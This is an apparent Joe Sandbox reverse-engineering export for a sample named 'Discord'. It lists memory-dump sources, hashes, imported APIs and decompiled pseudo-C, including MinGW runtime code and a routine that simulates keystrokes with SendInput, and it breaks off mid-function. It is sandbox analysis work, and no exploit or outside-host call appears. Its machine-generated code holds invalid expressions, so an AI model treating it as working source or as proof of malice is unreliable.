Xm, xrefs: 6DE8624E
@m, xrefs: 6DE8613B

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Gdip$DisposeFreeImage$CursorSs7compare
String ID: @m$Xm$Xm$x
API String ID: 2463230333-2162019850
Opcode ID: 4b3aaace3860af1f802874841113e00ac3d61d09254e755d05e25b1e640faefc
Instruction ID: 80d004fbdbcd7c9f08bb10aa93ef167943faf94231d7d86a5e233567c385dd2f
Opcode Fuzzy Hash: 4b3aaace3860af1f802874841113e00ac3d61d09254e755d05e25b1e640faefc
Instruction Fuzzy Hash: 9A317AB1A15609CFDF10EFA9C58469CBBF0FB05348F21486EC959AB316EB309854CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6DE82729 Relevance: 16.6, APIs: 11, Instructions: 112keyboardsleepCOMMON

Download Yara Rule

APIs

_Z6Decre1P6HWND__ii.DFO1 ref: 6DE8245D
Sleep.KERNEL32 ref: 6DE82474
Sleep.KERNEL32 ref: 6DE8248D
GdipDisposeImage.GDIPLUS ref: 6DE824B8
GdipFree.GDIPLUS ref: 6DE824C3
_Z6Decre1P6HWND__ii.DFO1 ref: 6DE82507
MapVirtualKeyA.USER32 ref: 6DE8254A
MapVirtualKeyA.USER32 ref: 6DE8257D
MapVirtualKeyA.USER32 ref: 6DE825B0
MapVirtualKeyA.USER32 ref: 6DE825DE
SendInput.USER32 ref: 6DE82607
MapVirtualKeyA.USER32 ref: 6DE82647
MapVirtualKeyA.USER32 ref: 6DE8267A
MapVirtualKeyA.USER32 ref: 6DE826AD
MapVirtualKeyA.USER32 ref: 6DE826E0
SendInput.USER32 ref: 6DE82709

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Virtual$D__iiDecre1GdipInputSendSleep$DisposeFreeImage
String ID:
API String ID: 338920926-0
Opcode ID: 87271a0baeab8ec2b1f4cfed09206e86fe38cf77b5ab70900f9b2f55c04a66df
Instruction ID: 3206382c88cc86b9c6e6e9ad3fa287cc94565c6b33083331039bb086f8e6b6a8
Opcode Fuzzy Hash: 87271a0baeab8ec2b1f4cfed09206e86fe38cf77b5ab70900f9b2f55c04a66df
Instruction Fuzzy Hash: 2A5111B0109741CEEB10AF66D58431EBBF0FF85704F40482DE9D89B295E7BA8858CB57

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8C249 Relevance: 16.6, APIs: 11, Instructions: 65stringCOMMON

Download Yara Rule

APIs

_ZSt8__uniqueIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops19_Iter_equal_to_iterEET_SB_SB_T0_.DPUB1 ref: 6DE8C1E8
strstr.MSVCRT ref: 6DE8C25C
strstr.MSVCRT ref: 6DE8C275
strstr.MSVCRT ref: 6DE8C28E
strstr.MSVCRT ref: 6DE8C2A7
strstr.MSVCRT ref: 6DE8C2BC
_ZdlPv.LIBSTDC++-6 ref: 6DE8C2CB
GetWindowTextLengthA.USER32 ref: 6DE8C2DF
_Znaj.LIBSTDC++-6 ref: 6DE8C2EE
GetWindowTextA.USER32 ref: 6DE8C300
strstr.MSVCRT ref: 6DE8C315
_ZdlPv.LIBSTDC++-6 ref: 6DE8C32B
_ZSt16__insertion_sortIN9__gnu_cxx17__normal_iteratorIPP6HWND__St6vectorIS3_SaIS3_EEEENS0_5__ops15_Iter_less_iterEEvT_SB_T0_.DPUB1 ref: 6DE8C34C
memmove.MSVCRT ref: 6DE8C3C5

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: strstr$N9__gnu_cxx17__normal_iteratorSt6vectorTextWindow$Iter_equal_to_iterIter_less_iterLengthS0_5__ops15_S0_5__ops19_St16__insertion_sortSt8__uniqueZnajmemmove
String ID:
API String ID: 2918554379-0
Opcode ID: 16735ea67b4280605fa290c2009f737041c36ef14bbf03cd6bffc8cf97a7ad2d
Instruction ID: 81ee5f3bf4b547631998f5b927aa3e4069312591484590d6bd2759525de8e42c
Opcode Fuzzy Hash: 16735ea67b4280605fa290c2009f737041c36ef14bbf03cd6bffc8cf97a7ad2d
Instruction Fuzzy Hash: 82213AB0A0A7019FDB10AF69D58422DBBF0BF45B59F52492ED9ACDB341EB31D841CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81460 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6DE81475
LoadLibraryA.KERNEL32 ref: 6DE8148C
GetProcAddress.KERNEL32 ref: 6DE814A5
GetModuleHandleA.KERNEL32 ref: 6DE814D3
GetProcAddress.KERNEL32 ref: 6DE814EC

Strings

libgcc_s_dw2-1.dll, xrefs: 6DE8146E, 6DE81485
__register_frame_info, xrefs: 6DE8149A
_Jv_RegisterClasses, xrefs: 6DE814E1
libgcj-13.dll, xrefs: 6DE814CC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad
String ID: _Jv_RegisterClasses$__register_frame_info$libgcc_s_dw2-1.dll$libgcj-13.dll
API String ID: 652391981-159345992
Opcode ID: e2b29a471b12baffc93d6a3343a264402c442e3d3648da014bddea294faae01c
Instruction ID: a015f95691c8a1fca5b7455cfa7e3bfc49eb641f6c748a1378465c7f974411c3
Opcode Fuzzy Hash: e2b29a471b12baffc93d6a3343a264402c442e3d3648da014bddea294faae01c
Instruction Fuzzy Hash: 4E01ADB090A2028BEB10BFB9854A76E7EF4EF42205F21442CD8999F304EF34D854CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8DFE0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6DE8E00B
vfprintf.MSVCRT ref: 6DE8E027
abort.MSVCRT ref: 6DE8E02C
VirtualQuery.KERNEL32 ref: 6DE8E0CA

Strings

@, xrefs: 6DE8E10A

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: @
API String ID: 2513968241-2766056989
Opcode ID: fc96273a934e4ff8c3a70cf4c78475c289c97be14c6ca3206c0181d7137ccc0e
Instruction ID: c222e35c3e002674f953fd5cb331bfb138fff741245b8a5ed02a92ce4ca3645d
Opcode Fuzzy Hash: fc96273a934e4ff8c3a70cf4c78475c289c97be14c6ca3206c0181d7137ccc0e
Instruction Fuzzy Hash: 6D4170B1909B429FDB00DF69C58471AB7F4FB45B48F65882EE988DB312EB35D844CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83A4C Relevance: 12.0, APIs: 8, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DE83A4C() {
				intOrPtr _t17;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t37;
				void* _t38;
				intOrPtr* _t39;

				_t27 = _t17;
				 *_t39 = _t37;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t38 - 0xcc)));
				 *_t39 = _t37;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t38 - 0xdc)));
				 *_t39 = _t37;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t38 - 0xd8)));
				 *_t39 = _t37;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t38 - 0xd4)));
				 *_t39 = _t37;
				L6DE8DD48();
				while(1) {
					_t24 = _t38 - 0xe3;
					 *_t39 = _t24;
					L6DE8DD48();
					_push(_t24);
					 *_t39 = _t27;
					L6DE8EBA0();
					_t27 = _t24;
					 *_t39 =  *((intOrPtr*)(_t38 - 0xf0));
					L6DE8DD48();
				}
			}

0x6de83a4c
0x6de83a54
0x6de83a5a
0x6de83a5f
0x6de83a66
0x6de83a6c
0x6de83a71
0x6de83a78
0x6de83a7e
0x6de83a83
0x6de83a8a
0x6de83a90
0x6de83a95
0x6de83a9c
0x6de83aa2
0x6de83aa8
0x6de83ab1
0x6de83ab7
0x6de83aba
0x6de83abf
0x6de83ac0
0x6de83ac3
0x6de83ac8
0x6de83ad9
0x6de83adc
0x6de83ae1

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE83A5A
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000), ref: 6DE83A6C
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000), ref: 6DE83A7E
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000), ref: 6DE83A90
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000), ref: 6DE83AA2
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000), ref: 6DE83ABA
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83AC3
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,00000000,00000000,00000000,00000000), ref: 6DE83ADC

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 1e615f03414ef688fceeade0a8715e5eeb156418943cb75c2c570d63ca48c44a
Instruction ID: f8b94f9b8638cef46a7d51c0203cacd5e0c37fb1d682394801402df0cc739824
Opcode Fuzzy Hash: 1e615f03414ef688fceeade0a8715e5eeb156418943cb75c2c570d63ca48c44a
Instruction Fuzzy Hash: CD11F7B49499158FC710EF18D888B9CF7F8EF98214F11859EA54AE7251DB306A84CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00401BC0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401BC0(void* __ebx, signed int __edi, void* __esi) {
				void* _v16;
				signed int _v44;
				signed int _v56;
				char _v60;
				void* _v61;
				signed short _v64;
				char* _v80;
				intOrPtr _v84;
				signed char* _v88;
				intOrPtr _t54;
				void* _t59;
				int _t63;
				long _t69;
				signed char* _t73;
				void* _t74;
				intOrPtr _t80;
				signed short _t81;
				signed int _t95;
				intOrPtr* _t96;
				void* _t99;
				intOrPtr _t101;
				signed int _t108;
				signed int _t109;
				signed int _t114;
				intOrPtr _t120;
				signed char _t122;
				intOrPtr _t126;
				signed char* _t127;
				void* _t131;
				char** _t133;

				_t118 = __edi;
				_t54 =  *0x406060;
				if(_t54 == 0) {
					_push(__edi);
					_push(__esi);
					 *0x406060 = 1;
					_t59 = E00402638(0x0000001e + (E00402410() + _t55 * 0x00000002) * 0x00000004 & 0xfffffff0, __ebx);
					 *0x406064 = 0;
					_t133 = _t131 - 0x4c - _t59;
					 *0x406068 =  &_v61 & 0xfffffff0;
					_t63 = 0x54;
					if(0x404be4 <= 7) {
						L14:
						return _t63;
					} else {
						if(0x404be4 <= 0xb) {
							_t95 = 0x404b90;
							goto L25;
						} else {
							_t63 =  *0x404b90; // 0x0
							if(_t63 != 0) {
								L15:
								_t95 = 0x404b90;
								goto L16;
							} else {
								_t63 =  *0x404b94; // 0x0
								if(_t63 != 0) {
									goto L15;
								} else {
									_t118 =  *0x404b98; // 0x1
									_t95 = 0x404b9c;
									if(_t118 == 0) {
										L25:
										_t125 =  *_t95;
										if( *_t95 != 0) {
											L16:
											if(_t95 >= 0x404be4) {
												goto L14;
											} else {
												do {
													_t15 = _t95 + 4; // 0x0
													_t126 =  *_t15;
													_t95 = _t95 + 8;
													_t16 = _t126 + 0x400000; // 0x905a4d
													_t17 = _t126 + 0x400000; // 0x400000
													_t18 = _t95 - 8; // 0x6a6f7270
													_v56 =  *_t16 +  *_t18;
													E00401A80(_t17, _t95, _t118, _t126);
													 *(_t126 + 0x400000) = _v56;
												} while (_t95 < 0x404be4);
												goto L18;
											}
										} else {
											_t37 = _t95 + 4; // 0x0
											if( *_t37 == 0) {
												goto L8;
											} else {
												goto L16;
											}
										}
									} else {
										_t95 = 0x404b90;
										L8:
										_t6 = _t95 + 8; // 0x1
										_t73 =  *_t6;
										if(_t73 != 1) {
											L34:
											_v88 = _t73;
											 *_t133 = "  Unknown pseudo relocation protocol version %d.\n";
											_t74 = L00401A20(_t95, _t118, _t125);
											asm("fninit");
											return _t74;
										} else {
											_t96 = _t95 + 0xc;
											if(_t96 < 0x404be4) {
												do {
													_t101 =  *_t96;
													_t7 = _t96 + 4; // 0x392e3420
													_t80 =  *_t7;
													_t8 = _t101 + 0x400000; // 0x400000
													_t9 = _t101 + 0x400000; // 0x905a4d
													_t120 =  *_t9;
													_v64 = _t8;
													_t11 = _t96 + 8; // 0x322e
													_t108 =  *_t11 & 0x000000ff;
													_t12 = _t80 + 0x400000; // 0x396e3420
													_t127 = _t12;
													if(_t108 == 0x10) {
														_t81 =  *(_t80 + 0x400000) & 0x0000ffff;
														_t109 = _t81 & 0x0000ffff;
														_v64 = _t81;
														_t110 =  <  ? _t109 | 0xffff0000 : _t109;
														_t111 = ( <  ? _t109 | 0xffff0000 : _t109) - _t101;
														_t112 = ( <  ? _t109 | 0xffff0000 : _t109) - _t101 - 0x400000;
														_t113 = ( <  ? _t109 | 0xffff0000 : _t109) - _t101 - 0x400000 + _t120;
														_v56 = ( <  ? _t109 | 0xffff0000 : _t109) - _t101 - 0x400000 + _t120;
														E00401A80(_t127, _t96, _t120, _t127);
														 *_t127 = _v56 & 0x0000ffff;
														goto L29;
													} else {
														if(_t108 == 0x20) {
															_t122 = _t120 - _v64 +  *_t127;
															_v56 = _t122;
															E00401A80(_t127, _t96, _t122, _t127);
															 *_t127 = _t122;
															goto L29;
														} else {
															if(_t108 == 8) {
																_t114 =  *_t127 & 0xff;
																_t115 =  <  ? _t114 | 0xffffff00 : _t114;
																_t116 = ( <  ? _t114 | 0xffffff00 : _t114) - _v64;
																_t117 = ( <  ? _t114 | 0xffffff00 : _t114) - _v64 + _t120;
																_v56 = ( <  ? _t114 | 0xffffff00 : _t114) - _v64 + _t120;
																E00401A80(_t127, _t96, _t120, _t127);
																 *_t127 = _v56 & 0x000000ff;
																goto L29;
															} else {
																_v88 = _t108;
																 *_t133 = "  Unknown pseudo relocation bit size %d.\n";
																_t63 = L00401A20(_t96, _t120, _t127);
																goto L14;
															}
														}
													}
													goto L36;
													L29:
													_t96 = _t96 + 0xc;
												} while (_t96 < 0x404be4);
												L18:
												_t63 =  *0x406064;
												_t95 = 0;
												if(_t63 > 0) {
													do {
														_t118 = _t95 + _t95 * 2;
														_t125 = _t118 * 4;
														_t63 =  *0x406068 + _t125;
														if( *_t63 == 0) {
															goto L20;
														} else {
															_v84 = 0x1c;
															_v88 =  &_v56;
															 *_t133 =  *(_t63 + 4);
															_t69 = VirtualQuery(??, ??, ??);
															_t133 = _t133 - 0xc;
															if(_t69 == 0) {
																_t99 =  *0x406068 + _t125;
																_v84 =  *((intOrPtr*)(_t99 + 4));
																 *_t133 = "  VirtualQuery failed for %d bytes at address %p";
																_v88 =  *((intOrPtr*)( *((intOrPtr*)(_t99 + 8)) + 8));
																_t73 = L00401A20(_t95, _t118, _t125);
																goto L34;
															} else {
																_v80 =  &_v60;
																_v84 =  *((intOrPtr*)( *0x406068 + _t118 * 4));
																_v88 = _v44;
																 *_t133 = _v56;
																_t63 = VirtualProtect(??, ??, ??, ??);
																_t133 = _t133 - 0x10;
																goto L20;
															}
														}
														goto L36;
														L20:
														_t95 = _t95 + 1;
													} while (_t95 <  *0x406064);
												} else {
												}
											}
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					return _t54;
				}
				L36:
			}

0x00401bc0
0x00401bc0
0x00401bc7
0x00401bd3
0x00401bd4
0x00401bd9
0x00401bf5
0x00401bfa
0x00401c04
0x00401c0d
0x00401c17
0x00401c1f
0x00401cc0
0x00401cc7
0x00401c25
0x00401c28
0x00401d83
0x00000000
0x00401c2e
0x00401c2e
0x00401c35
0x00401cc8
0x00401cc8
0x00000000
0x00401c3b
0x00401c3b
0x00401c42
0x00000000
0x00401c48
0x00401c48
0x00401c4e
0x00401c55
0x00401d88
0x00401d88
0x00401d8c
0x00401ccd
0x00401cd3
0x00000000
0x00401cd5
0x00401cd5
0x00401cd5
0x00401cd5
0x00401cd8
0x00401cdb
0x00401ce1
0x00401ce7
0x00401cea
0x00401ced
0x00401cfb
0x00401cfb
0x00000000
0x00401cd5
0x00401d92
0x00401d92
0x00401d97
0x00000000
0x00401d9d
0x00000000
0x00401d9d
0x00401d97
0x00401c5b
0x00401c5b
0x00401c60
0x00401c60
0x00401c60
0x00401c66
0x00401e50
0x00401e50
0x00401e54
0x00401e5b
0x00401e60
0x00401e62
0x00401c6c
0x00401c6c
0x00401c75
0x00401c77
0x00401c77
0x00401c79
0x00401c79
0x00401c7c
0x00401c82
0x00401c82
0x00401c88
0x00401c8b
0x00401c8b
0x00401c8f
0x00401c8f
0x00401c98
0x00401da2
0x00401da9
0x00401dac
0x00401dbc
0x00401dc1
0x00401dc3
0x00401dc9
0x00401dcb
0x00401dce
0x00401dd7
0x00000000
0x00401c9e
0x00401ca1
0x00401e1d
0x00401e1f
0x00401e22
0x00401e27
0x00000000
0x00401ca7
0x00401caa
0x00401df1
0x00401dfe
0x00401e03
0x00401e06
0x00401e08
0x00401e0b
0x00401e14
0x00000000
0x00401cb0
0x00401cb0
0x00401cb4
0x00401cbb
0x00000000
0x00401cbb
0x00401caa
0x00401ca1
0x00000000
0x00401dda
0x00401dda
0x00401ddd
0x00401d03
0x00401d03
0x00401d08
0x00401d0c
0x00401d1b
0x00401d20
0x00401d23
0x00401d2a
0x00401d30
0x00000000
0x00401d32
0x00401d35
0x00401d3d
0x00401d44
0x00401d47
0x00401d4d
0x00401d52
0x00401e31
0x00401e36
0x00401e40
0x00401e47
0x00401e4b
0x00000000
0x00401d58
0x00401d5b
0x00401d67
0x00401d6e
0x00401d75
0x00401d78
0x00401d7e
0x00000000
0x00401d7e
0x00401d52
0x00000000
0x00401d10
0x00401d10
0x00401d13
0x00000000
0x00401d0e
0x00401d0c
0x00000000
0x00401c75
0x00401c66
0x00401c55
0x00401c42
0x00401c35
0x00401c28
0x00401bc9
0x00401bc9
0x00401bc9
0x00000000

Strings

Mingw-w64 runtime failure:, xrefs: 00401A3D
Unknown pseudo relocation protocol version %d., xrefs: 00401E54
Unknown pseudo relocation bit size %d., xrefs: 00401CB4
VirtualQuery failed for %d bytes at address %p, xrefs: 00401E40

Memory Dump Source

Source File: 0000000E.00000002.771715150.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.771666163.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771776151.0000000000404000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771818604.0000000000407000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000E.00000002.771867992.000000000040A000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_Discord .jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p$Mingw-w64 runtime failure:
API String ID: 0-1068558636
Opcode ID: 88e7c832afa953b6e57e753986bd076c6aeef3b8a8bf3764f32bb736b1778d8b
Instruction ID: b0e65e04443a0bae6aebb3d96da4902506e983208f201306cc0a29b0f4579d10
Opcode Fuzzy Hash: 88e7c832afa953b6e57e753986bd076c6aeef3b8a8bf3764f32bb736b1778d8b
Instruction Fuzzy Hash: 29718B74A092049BCB10DF69EA8476EB7F1AF84304F14843BF945BB3A5D738E854CB99

Uniqueness

Uniqueness Score: -1.00%

Function 6DE81040 Relevance: 10.6, APIs: 7, Instructions: 137sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,?,?,6DE8139D), ref: 6DE81077
_amsg_exit.MSVCRT ref: 6DE810A4
Sleep.KERNEL32(?,?,?,?,?,?,6DE8139D), ref: 6DE810E4

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Sleep$_amsg_exit
String ID:
API String ID: 2363106680-0
Opcode ID: 82262866e604156f327d1c05dc636150eb38981cceb1ec7af3d60065a6a59c1c
Instruction ID: 3a6318c77c41b223db4744427b624b0aaee7f92f5d29719068f21fd88ac03820
Opcode Fuzzy Hash: 82262866e604156f327d1c05dc636150eb38981cceb1ec7af3d60065a6a59c1c
Instruction Fuzzy Hash: EB41B2716462428FDB50DFA8C88475A77F0FB46348F21842EE968DF306DF759841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE93820 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6DE9382F
GetProcAddress.KERNEL32 ref: 6DE9384F
GetProcAddress.KERNEL32 ref: 6DE93870

Strings

___lc_codepage_func, xrefs: 6DE93844
__lc_codepage, xrefs: 6DE93865
msvcrt.dll, xrefs: 6DE93828

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 26e6df52c961a1073f12b057a10405f9756227ad54ea2a247409da9325857747
Instruction ID: ce77f5a24a240b139ff0dc40f381c2c44eea0c98ff2d014d6ef16dd714cc5a73
Opcode Fuzzy Hash: 26e6df52c961a1073f12b057a10405f9756227ad54ea2a247409da9325857747
Instruction Fuzzy Hash: E8F06D71D062058BDB106F79594A3AA7FF4EB05251F60556AD848EF345EF309414CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83B32 Relevance: 10.5, APIs: 7, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DE83B32() {
				intOrPtr _t15;
				intOrPtr _t21;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t34;
				intOrPtr* _t35;

				_t24 = _t15;
				 *_t35 = _t33;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t34 - 0xdc)));
				 *_t35 = _t33;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t34 - 0xd8)));
				 *_t35 = _t33;
				L6DE8DD48();
				_push( *((intOrPtr*)(_t34 - 0xd4)));
				 *_t35 = _t33;
				L6DE8DD48();
				while(1) {
					_t21 = _t34 - 0xe3;
					 *_t35 = _t21;
					L6DE8DD48();
					_push(_t21);
					 *_t35 = _t24;
